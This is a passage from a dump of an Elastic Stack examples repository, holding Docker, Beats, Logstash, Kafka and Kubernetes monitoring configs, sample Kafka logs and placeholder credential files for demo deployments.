15 | 1. ML or watches?
16 | 1. unless-stopped?


--------------------------------------------------------------------------------
/Miscellaneous/docker/README.md:
--------------------------------------------------------------------------------
 1 | # Docker Examples
 2 | 
 3 | ## Official Images
 4 | 
 5 | Elastic maintains official docker images for all components in the stack. Please refer to official documentation for these images, more specifically:
 6 | 
 7 | 
 8 | ### Elasticsearch 
 9 | 
10 | https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html
11 | 
12 | ### Kibana
13 | 
14 | https://www.elastic.co/guide/en/kibana/current/docker.html
15 | 
16 | ### Logstash
17 | 
18 | https://www.elastic.co/guide/en/logstash/current/docker.html
19 | 
20 | 
21 | ## Full Stack Examples
22 | 
23 | A full stack example, which installs Logstash, Beats and Elasticsearch can be found [here](https://github.com/elastic/examples/tree/master/Miscellaneous/docker/full_stack_example).
24 | This deploys a full example architecture of the Elastic Stack with data provided by Logstash and Beats modules.


--------------------------------------------------------------------------------
/Miscellaneous/docker/create_packages.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | rm full_stack_example/full_stack_example.*
3 | tar -cvf full_stack_example.tar.gz full_stack_example
4 | zip -r full_stack_example.zip full_stack_example
5 | mv full_stack_example.tar.gz full_stack_example/
6 | mv full_stack_example.zip full_stack_example/
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/.env:
--------------------------------------------------------------------------------
1 | ELASTIC_VERSION=5.5.1
2 | ES_PASSWORD=changeme
3 | MYSQL_ROOT_PASSWORD=changeme
4 | DEFAULT_INDEX_PATTERN=metricbeat-*
5 | ES_MEM_LIMIT=2g
6 | ES_JVM_HEAP=1024m


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/apache2/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM httpd:2.4.20
2 | RUN apt-get update && apt-get install -y curl
3 | HEALTHCHECK CMD curl -f http://localhost
4 | COPY ./httpd.conf /usr/local/apache2/conf/httpd.conf


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/filebeat/prospectors.d/docker.yml:
--------------------------------------------------------------------------------
1 | #This prospector captures the docker logs
2 | - input_type: log
3 |   paths:
4 |     - /hostfs/var/lib/docker/containers/*/*.log
5 |   json.keys_under_root: true
6 |   json.overwrite_keys: true
7 |   close_inactive: 24h
8 |   close_renamed: true
9 |   pipeline: docker-logs


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/metricbeat.yml:
--------------------------------------------------------------------------------
 1 | metricbeat.config.modules:
 2 | #Modules are enabled by reading the .modules.d sub directory. Changes to these will automatically be detected and reflected.
 3 |   path: ${path.config}/modules.d/*.yml
 4 |   reload.period: 10s
 5 |   reload.enabled: true
 6 | #All data indexed to Elasticsearch
 7 | output.elasticsearch:
 8 |   hosts: ["elasticsearch:9200"]
 9 | logging.to_files: false
10 | 
11 | 


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/modules.d/apache.yml:
--------------------------------------------------------------------------------
1 | - module: apache
2 |   metricsets: ["status"]
3 |   enabled: true
4 |   period: 10s
5 |   hosts: ["http://apache2"]
6 |   server_status_path: "server-status"


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/modules.d/docker.yml:
--------------------------------------------------------------------------------
1 | - module: docker
2 |   metricsets: ["container", "cpu", "diskio", "healthcheck", "info", "memory", "network"]
3 |   hosts: ["unix:///var/run/docker.sock"]
4 |   enabled: true
5 |   period: 10s


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/modules.d/mysql.yml:
--------------------------------------------------------------------------------
1 | - module: mysql
2 |   metricsets: ["status"]
3 |   enabled: true
4 |   period: 10s
5 |   hosts: ["root:${MYSQL_ROOT_PASSWORD:changeme}@tcp(mysql:3306)/"]


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/modules.d/nginx.yml:
--------------------------------------------------------------------------------
1 | - module: nginx
2 |   metricsets: ["stubstatus"]
3 |   enabled: true
4 |   period: 10s
5 |   hosts: ["http://nginx"]
6 |   server_status_path: "server-status"


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/modules.d/system.yml:
--------------------------------------------------------------------------------
 1 | - module: system
 2 |   metricsets:
 3 |     - core
 4 |     - cpu
 5 |     - load
 6 |     - diskio
 7 |     - filesystem
 8 |     - fsstat
 9 |     - memory
10 |     - network
11 |     - process
12 |     - socket
13 |   enabled: true
14 |   period: 10s
15 |   processes: ['.*']
16 |   cpu_ticks: true
17 |   process.cgroups.enabled: true


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/packetbeat/packetbeat.yml:
--------------------------------------------------------------------------------
 1 | #We monitor any devices on the host OS. For windows and OSX this is the VM hosting docker.
 2 | packetbeat.interfaces.device: any
 3 | packetbeat.flows:
 4 |   enabled: true
 5 |   timeout: 30s
 6 |   period: 10s
 7 | packetbeat.protocols.icmp:
 8 |   enabled: true
 9 | packetbeat.protocols.dns:
10 |   enabled: true
11 |   ports: [53]
12 |   include_authorities: true
13 |   include_additionals: true
14 | #We monitor any traffic to kibana, apache, ngnix and ES
15 | packetbeat.protocols.http:
16 |   enabled: true
17 |   ports: [9200, 80, 8080, 8000, 5000, 8002, 5601]
18 |   send_headers: true
19 |   send_all_headers: true
20 |   split_cookie: true
21 |   send_request: false
22 |   send_response: false
23 |   transaction_timeout: 10s
24 | packetbeat.protocols.mysql:
25 |   ports: [3306]
26 | output.elasticsearch:
27 |   hosts: ["localhost:9200"]
28 | logging.to_files: false
29 | logging.to_files: false


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/elasticsearch/elasticsearch.yml:
--------------------------------------------------------------------------------
1 | cluster.name: full-stack-cluster
2 | node.name: node-1
3 | path.data: /usr/share/elasticsearch/data
4 | http.port: 9200


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/kibana/kibana.yml:
--------------------------------------------------------------------------------
1 | server.port: 127.0.0.1:5601
2 | elasticsearch.url: "http://elasticsearch:9200"
3 | server.name: "full-stack-example"


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/mysql/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM mysql:5.7.12
2 | COPY ./conf-file.cnf /etc/mysql/conf.d/conf-file.cnf
3 | RUN apt-get update && apt-get install -y netcat
4 | HEALTHCHECK CMD nc -z localhost 3306


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/mysql/conf-file.cnf:
--------------------------------------------------------------------------------
 1 | [mysqld]
 2 | log-output  = FILE
 3 | log_error = /var/log/mysql/error.log
 4 | general_log_file = /var/log/mysql/mysql.log
 5 | general_log = 1
 6 | slow_query_log  = 1
 7 | slow_query_log_file=/var/log/mysql/mysql-slow.log.log
 8 | long_query_time = 1
 9 | log_queries_not_using_indexes = 1
10 | log_slow_admin_statements = 1


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/nginx/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM nginx:1.9
2 | RUN apt-get update && apt-get install -y curl
3 | HEALTHCHECK CMD curl -f http://localhost/server-status
4 | COPY ./nginx.conf /etc/nginx/


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/nginx/nginx.conf:
--------------------------------------------------------------------------------
 1 | user  nginx;
 2 | worker_processes  1;
 3 | 
 4 | error_log  /var/log/nginx/error.log warn;
 5 | pid        /var/run/nginx.pid;
 6 | 
 7 | 
 8 | events {
 9 |     worker_connections  1024;
10 | }
11 | 
12 | 
13 | http {
14 |     include       /etc/nginx/mime.types;
15 |     default_type  application/octet-stream;
16 | 
17 |     log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
18 |                       '$status $body_bytes_sent "$http_referer" '
19 |                       '"$http_user_agent" "$http_x_forwarded_for"';
20 | 
21 |     access_log  /var/log/nginx/access.log main;
22 | 
23 |     server {
24 |         listen 80;
25 |         server_name localhost;
26 | 
27 |         location /server-status {
28 |             stub_status on;
29 |         }
30 |     }
31 | 
32 |     include /etc/nginx/conf.d/*;
33 | }


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/full_stack_example.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/docker/full_stack_example/full_stack_example.tar.gz


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/full_stack_example.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/docker/full_stack_example/full_stack_example.zip


--------------------------------------------------------------------------------
/Miscellaneous/gdpr/pseudonymization/Dockerfile:
--------------------------------------------------------------------------------
1 | ARG TAG
2 | FROM docker.elastic.co/logstash/logstash-oss:$TAG
3 | MAINTAINER Dale McDiarmid "dalem@elastic.co"
4 | 
5 | RUN rm /usr/share/logstash/pipeline/logstash.conf
6 | RUN /usr/share/logstash/bin/logstash-plugin update logstash-filter-ruby
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/gdpr/pseudonymization/pipelines.yml:
--------------------------------------------------------------------------------
1 | - pipeline.id: fingerprint_filter
2 |   path.config: "/usr/share/logstash/pipeline/logstash_fingerprint.conf"
3 |   pipeline.workers: 1
4 | - pipeline.id: ruby_filter
5 |   path.config: "/usr/share/logstash/pipeline/logstash_script_fingerprint.conf"
6 |   pipeline.workers: 1


--------------------------------------------------------------------------------
/Miscellaneous/gdpr/pseudonymization/pseudonymise.rb:
--------------------------------------------------------------------------------
 1 | require "openssl"
 2 | 
 3 | # register accepts the hashmap passed to "script_params"
 4 | # it runs once at startup
 5 | def register(params)
 6 |   @fields = params["fields"]
 7 |   @tag = params["tag"]
 8 |   @key = params["key"]
 9 |   @digest = OpenSSL::Digest::SHA256.new
10 | end
11 | 
12 | # filter runs for every event
13 | def filter(event)
14 |   # process each field
15 |   events = []
16 |   @fields.each do |field|
17 |     if event.get(field)
18 |         val=event.get(field)
19 |         hash=OpenSSL::HMAC.hexdigest(@digest, @key, val.to_s).force_encoding(Encoding::UTF_8)
20 |         p=LogStash::Event.new();
21 |         p.set('value',val);
22 |         p.set('key',hash);
23 |         p.tag(@tag);
24 |         #spawn event
25 |         events.push(p)
26 |         #override original value
27 |         event.set(field,hash);
28 |      end
29 | 
30 |   end
31 |   events.push(event)
32 |   return events
33 | end


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/README.md:
--------------------------------------------------------------------------------
1 | # Monitoring Kafka
2 | 
3 | This directory contains sample configuration files and logs
4 | for the "Monitoring Kafka with Elastic Stack" blog series.
5 | 
6 | See sub-directories for instructions.
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/es_stack/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | ---
 2 | version: '2'
 3 | services:
 4 |   kibana:
 5 |     image: docker.elastic.co/kibana/kibana:5.1.1
 6 |     links:
 7 |       - elasticsearch
 8 |     ports:
 9 |       - 5601:5601
10 | 
11 |   elasticsearch:
12 |     image: docker.elastic.co/elasticsearch/elasticsearch:5.1.1
13 |     cap_add:
14 |       - IPC_LOCK
15 |     volumes:
16 |       - esdata1:/usr/share/elasticsearch/data
17 |     ports:
18 |       - 9200:9200
19 | 
20 | volumes:
21 |   esdata1:
22 |     driver: local
23 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/kafka-authorizer.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/kafka-authorizer.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/kafka-request.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/kafka-request.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/log-cleaner.log.2016-12-19-16:
--------------------------------------------------------------------------------
1 | [2016-12-19 16:31:47,278] INFO Starting the log cleaner (kafka.log.LogCleaner)
2 | [2016-12-19 16:31:47,283] INFO [kafka-log-cleaner-thread-0], Starting  (kafka.log.LogCleaner)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/server.log.2016-12-19-17:
--------------------------------------------------------------------------------
1 | [2016-12-19 17:01:48,683] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
2 | [2016-12-19 17:11:48,683] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
3 | [2016-12-19 17:21:48,683] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
4 | [2016-12-19 17:31:48,685] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 2 milliseconds. (kafka.coordinator.GroupMetadataManager)
5 | [2016-12-19 17:41:48,683] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
6 | [2016-12-19 17:51:48,683] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/controller.log:
--------------------------------------------------------------------------------
1 | [2016-12-19 19:27:49,190] INFO [Controller 1]: Controller starting up (kafka.controller.KafkaController)
2 | [2016-12-19 19:27:49,203] INFO [Controller 1]: Controller startup complete (kafka.controller.KafkaController)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/controller.log.2016-12-19-16:
--------------------------------------------------------------------------------
1 | [2016-12-19 16:32:01,175] INFO [Controller 1]: Controller starting up (kafka.controller.KafkaController)
2 | [2016-12-19 16:32:01,193] INFO [Controller 1]: Controller startup complete (kafka.controller.KafkaController)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/controller.log.2016-12-19-18:
--------------------------------------------------------------------------------
1 | [2016-12-19 18:14:43,375] DEBUG [Controller 1]: Controller resigning, broker id 1 (kafka.controller.KafkaController)
2 | [2016-12-19 18:14:43,390] DEBUG [Controller 1]: De-registering IsrChangeNotificationListener (kafka.controller.KafkaController)
3 | [2016-12-19 18:14:43,404] INFO [Partition state machine on Controller 1]: Stopped partition state machine (kafka.controller.PartitionStateMachine)
4 | [2016-12-19 18:14:43,411] INFO [Replica state machine on controller 1]: Stopped replica state machine (kafka.controller.ReplicaStateMachine)
5 | [2016-12-19 18:14:43,411] INFO [Controller 1]: Broker 1 resigned as the controller (kafka.controller.KafkaController)
6 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/kafka-authorizer.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/kafka-authorizer.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/kafka-request.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/kafka-request.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/log-cleaner.log.2016-12-19-16:
--------------------------------------------------------------------------------
1 | [2016-12-19 16:32:01,022] INFO Starting the log cleaner (kafka.log.LogCleaner)
2 | [2016-12-19 16:32:01,026] INFO [kafka-log-cleaner-thread-0], Starting  (kafka.log.LogCleaner)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/server.log.2016-12-19-17:
--------------------------------------------------------------------------------
1 | [2016-12-19 17:02:01,351] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
2 | [2016-12-19 17:12:01,351] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
3 | [2016-12-19 17:22:01,352] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
4 | [2016-12-19 17:32:01,351] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
5 | [2016-12-19 17:42:01,351] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
6 | [2016-12-19 17:52:01,351] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/controller.log:
--------------------------------------------------------------------------------
1 | [2016-12-19 20:54:32,929] INFO [SessionExpirationListener on 2], ZK expired; shut down all controller components and try to re-elect (kafka.controller.KafkaController$SessionExpirationListener)
2 | [2016-12-19 20:54:32,949] DEBUG [Controller 2]: Controller resigning, broker id 2 (kafka.controller.KafkaController)
3 | [2016-12-19 20:54:32,950] DEBUG [Controller 2]: De-registering IsrChangeNotificationListener (kafka.controller.KafkaController)
4 | [2016-12-19 20:54:32,962] INFO [Partition state machine on Controller 2]: Stopped partition state machine (kafka.controller.PartitionStateMachine)
5 | [2016-12-19 20:54:32,983] INFO [Replica state machine on controller 2]: Stopped replica state machine (kafka.controller.ReplicaStateMachine)
6 | [2016-12-19 20:54:32,988] INFO [Controller 2]: Broker 2 resigned as the controller (kafka.controller.KafkaController)
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/controller.log.2016-12-19-16:
--------------------------------------------------------------------------------
1 | [2016-12-19 16:32:18,938] INFO [Controller 2]: Controller starting up (kafka.controller.KafkaController)
2 | [2016-12-19 16:32:18,953] INFO [Controller 2]: Controller startup complete (kafka.controller.KafkaController)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/kafka-authorizer.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/kafka-authorizer.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/kafka-request.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/kafka-request.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/log-cleaner.log.2016-12-19-16:
--------------------------------------------------------------------------------
1 | [2016-12-19 16:32:18,746] INFO Starting the log cleaner (kafka.log.LogCleaner)
2 | [2016-12-19 16:32:18,748] INFO [kafka-log-cleaner-thread-0], Starting  (kafka.log.LogCleaner)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/server.log.2016-12-19-17:
--------------------------------------------------------------------------------
1 | [2016-12-19 17:02:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
2 | [2016-12-19 17:12:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
3 | [2016-12-19 17:22:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
4 | [2016-12-19 17:32:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
5 | [2016-12-19 17:42:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
6 | [2016-12-19 17:52:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring_with_beats_modules/Vagrantfile:
--------------------------------------------------------------------------------
 1 | # -*- mode: ruby -*-
 2 | # vi: set ft=ruby :
 3 | 
 4 | Vagrant.configure("2") do |config|
 5 |   config.vm.box = "ubuntu/bionic64"
 6 |   config.vm.provision "shell", path: "provisioner.sh", env: {
 7 |     "CLOUD_ID" => "#{ENV['CLOUD_ID']}",
 8 |     "CLOUD_AUTH" => "#{ENV['CLOUD_AUTH']}"
 9 |   }
10 | 
11 |   config.vm.provider "virtualbox" do |v|
12 |     v.memory = 2096
13 |     v.cpus = 2
14 |   end
15 | 
16 |   config.vm.provision :hosts, :sync_hosts => true, :add_localhost_hostnames => false
17 | 
18 |   (0..2).each do |node_index|
19 |     config.vm.define "kafka#{node_index}" do |node|
20 |       node.vm.network :private_network, :ip => "10.200.200.#{node_index + 10}"
21 |       node.vm.hostname = "kafka#{node_index}"
22 |     end
23 |   end
24 | end
25 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring_with_beats_modules/run-kafka.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | KAFKA_VERSION=2.1.1
 4 | SCALA_VERSION=2.12
 5 | KAFKA_TAR_FILENAME=kafka_${SCALA_VERSION}-${KAFKA_VERSION}
 6 | 
 7 | cd /opt/${KAFKA_TAR_FILENAME}
 8 | 
 9 | bin/kafka-server-stop.sh
10 | nohup bin/kafka-server-start.sh config/server.properties > /dev/null &
11 | 
12 | if [ "$(hostname)" == "kafka0" ]; then
13 |   sleep 10
14 |   bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 2 --partitions 3 --topic beats
15 | 
16 |   filebeat setup -e
17 |   metricbeat setup -e
18 | fi
19 | 
20 | service filebeat start
21 | service metricbeat start
22 | 


--------------------------------------------------------------------------------
/Miscellaneous/kibana_geoserver/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM kartoza/geoserver
2 | MAINTAINER Elastic Infra <infra@elastic.co>
3 | 
4 | ENV GEOSERVER_DATA_DIR /opt/geoserver/data_dir
5 | 
6 | RUN mkdir -p $GEOSERVER_DATA_DIR/shapefiles
7 | 
8 | COPY *.shp $GEOSERVER_DATA_DIR/shapefiles/
9 | 


--------------------------------------------------------------------------------
/MonitoringEKS/config/metricbeat-iam-policy.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "Version": "2012-10-17",
 3 |     "Statement": [
 4 |         {
 5 |             "Sid": "VisualEditor0",
 6 |             "Effect": "Allow",
 7 |             "Action": [
 8 |                 "ec2:DescribeRegions",
 9 |                 "cloudwatch:GetMetricData",
10 |                 "cloudwatch:ListMetrics",
11 |                 "tag:getResources",
12 |                 "sts:GetCallerIdentity",
13 |                 "iam:ListAccountAliases",
14 |                 "ec2:DescribeInstances",
15 |                 "rds:DescribeDBInstances",
16 |                 "sqs:ListQueues"
17 |             ],
18 |             "Resource": "*"
19 |         }
20 |     ]
21 | }


--------------------------------------------------------------------------------
/MonitoringEKS/images/k8s-overview.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringEKS/images/k8s-overview.png


--------------------------------------------------------------------------------
/MonitoringEKS/images/k8s.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringEKS/images/k8s.png


--------------------------------------------------------------------------------
/MonitoringEKS/images/logs-app.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringEKS/images/logs-app.png


--------------------------------------------------------------------------------
/MonitoringEKS/images/metrics-app.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringEKS/images/metrics-app.png


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/CREDS/AWS_ACCESS_KEY_ID:
--------------------------------------------------------------------------------
1 | <text>


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/CREDS/AWS_ACCESS_KEY_SECRET:
--------------------------------------------------------------------------------
1 | <text>


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/CREDS/ELASTIC_CLOUD_AUTH:
--------------------------------------------------------------------------------
1 | user:password
2 | 


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/CREDS/ELASTIC_CLOUD_ID:
--------------------------------------------------------------------------------
1 | text


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/generate-secrets-manifest.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #removes secrets manifest file if already available
 4 | rm secrets.yaml
 5 | 
 6 | echo "
 7 | apiVersion: v1
 8 | kind: Secret
 9 | metadata:
10 |   name: metricbeat-secrets
11 |   namespace: kube-system
12 | data:" >> secrets.yaml
13 | 
14 | for file in CREDS/*; do 
15 |     if [ -f "$file" ]; then 
16 |       if [[ $file != *".secret" ]]; then
17 |         name=${file#CREDS/}
18 |         echo "  $name: \"$(cat $file | base64)\"" >> secrets.yaml
19 |       fi
20 |     fi 
21 | done


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/secrets-example.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Secret
 3 | metadata:
 4 |   name: beats-secrets
 5 | data:
 6 |   ELASTIC_CLOUD_ID: "b64string"
 7 |   ELASTIC_CLOUD_AUTH: "b64string"
 8 |   AWS_ACCESS_KEY_ID: "b64string"
 9 |   AWS_ACCESS_KEY_SECRET: "b64string"
10 | 
11 | 


--------------------------------------------------------------------------------
/MonitoringKubernetes/CLOUD_ID:
--------------------------------------------------------------------------------
1 | put cloud ID from cloud.elastic.co here. Make sure there is only one line in the file with only the password and no whitespace (replace this line).
2 | 
3 | 


--------------------------------------------------------------------------------
/MonitoringKubernetes/DockerDashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringKubernetes/DockerDashboard.png


--------------------------------------------------------------------------------
/MonitoringKubernetes/ELASTIC_PASSWORD:
--------------------------------------------------------------------------------
1 | Put password for elastic user here.  Make sure there is only one line in the file with only the password and no whitespace (replace this line).
2 | 


--------------------------------------------------------------------------------
/MonitoringKubernetes/download.txt:
--------------------------------------------------------------------------------
1 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/CLOUD_ID
2 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/ELASTIC_PASSWORD
3 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/elasticsearch.yaml
4 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/filebeat-kubernetes.yaml
5 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/guestbook.yaml
6 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/metricbeat-kubernetes.yaml
7 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/packetbeat-kubernetes.yaml
8 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/watch.txt
9 | 


--------------------------------------------------------------------------------
/MonitoringKubernetes/elasticsearch.yaml:
--------------------------------------------------------------------------------
 1 | xpack.notification.slack:
 2 |   account:
 3 |     monitoring:
 4 |       url: https://hooks.slack.com/services/T7SBS7MU6/xxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxx
 5 |       message_defaults:
 6 |         from: Elastic
 7 |         icon: https://pbs.twimg.com/media/CQt3cWzWIAA7o2y.png
 8 |         attachment:
 9 |           fallback: "Threshold Notification"
10 |           color: "#36a64f"
11 |           title: "Threshold Notification"
12 |           text: "One of your watches generated this notification."
13 |           mrkdwn_in: "pretext, text"
14 | 


--------------------------------------------------------------------------------
/MonitoringKubernetes/scaling-discover.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringKubernetes/scaling-discover.png


--------------------------------------------------------------------------------
/MonitoringKubernetes/watch.txt:
--------------------------------------------------------------------------------
 1 | Index: packetbeat-*
 2 | 
 3 | When max() of Responsetime
 4 | Over all docs
 5 | Is above 900
 6 | During the last 1 minute
 7 | 
 8 | Slack
 9 | 
10 | The maximum {{ctx.metadata.name}} was {{ctx.payload.result}}ms over the last minute.  This exceeded the threshold.
11 | 


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/css/recipes.css:
--------------------------------------------------------------------------------
